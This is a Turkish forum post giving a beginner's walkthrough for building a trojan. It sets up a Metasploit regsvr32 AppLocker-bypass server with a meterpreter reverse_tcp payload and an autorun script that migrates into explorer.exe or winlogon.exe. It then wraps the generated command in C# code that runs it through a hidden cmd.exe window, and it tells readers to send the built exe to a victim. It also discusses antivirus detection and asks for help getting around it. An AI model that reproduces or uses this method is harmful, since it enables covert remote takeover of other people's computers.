- 14 Mar 2017
- 166
- 0
Öncelikle herkese Selamın Aleyküm.
Arkadaşlar bu konuda windowsta yapışkan tuşları exploit etmeyi göstericem ve bunu c# da bir exe ile yapmayı göstericem.
Tek kötü yanı çalıştırdıkdan sonra virus programlarının algılanmasıdır bununda bir çözümünü bulmam için bana yardımcı olabilirisiniz.
İlk başta linuxta terminali açıyoruz ve msfconsole yazıyoruz.
use exploit/windows/misc/regsvr32_applocker_bypass_server yazıyoruz
daha sonra payload eklememiz gerekicek bu komutu giriyoruz.
set payload windows/meterpreter/reverse_tcp
şimdi ise ayarlarımızı yapmamız gerekiyor ben local ağ için ayar yapıcam siz port açıp dış ağ içinde yapabilirsiniz.
set LHOST 192.168.142.139
set LPORT 6666
Örnek resim ==> http://i.hizliresim.com/ld4mZQ.png
daha sonra karşıdaki şahıs çalıştırdığında otomatik explorer.exe ye veya winlogon.exe ye bulaşmamız için autoscript ekliyelim.
set autorunscript post/windows/manage/priv_migrate
Örnek resim ==> http://i.hizliresim.com/2rPB6E.png
şimdi ise son komutumuzu veriyoruz
exploit -j -z
ve bize bir kod veriyor o kodu cmd ye yazdıkdan sonra oturum açıyoruz.
Örnek resim ==> http://i.hizliresim.com/DPGp5m.png Kırmızı alan kodumuzdur.
Şimdi ise exe ye bastığımızda otomatik kodun çalışması için c# da bir kaç satır kod yazmamız gerekiyor.
KODLARIMIZ:
ilk başta bir kütüphane eklemek gerekiyor.
using System.Diagnostics;
Şimdi ise kodlarımız.
Process cmd = new Process();
cmd.StartInfo.FileName = "cmd.exe";
cmd.StartInfo.Arguments = "/C BURAYA LİNUXTA OLUŞTURDUĞUMUZ KODU YAZIYORUZ "; // Not "/C" bu ifadenin durması önemli yoksa cmd ekranda açık kalır.
cmd.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
cmd.Start();
ve bu kadar build yapıyoruz ve exe dosyamızı kurbana yolluyoruz.
Unutmayın exe dosyasında virüs görmez 0/35 ama çalışında antivürus programı görür.
Herhangi bir sorun olursa özelden veya yorumdan yazınız.
Konu acemice oldu yeniyim ilkdefa böyle konu açıyorum
Son düzenleme:
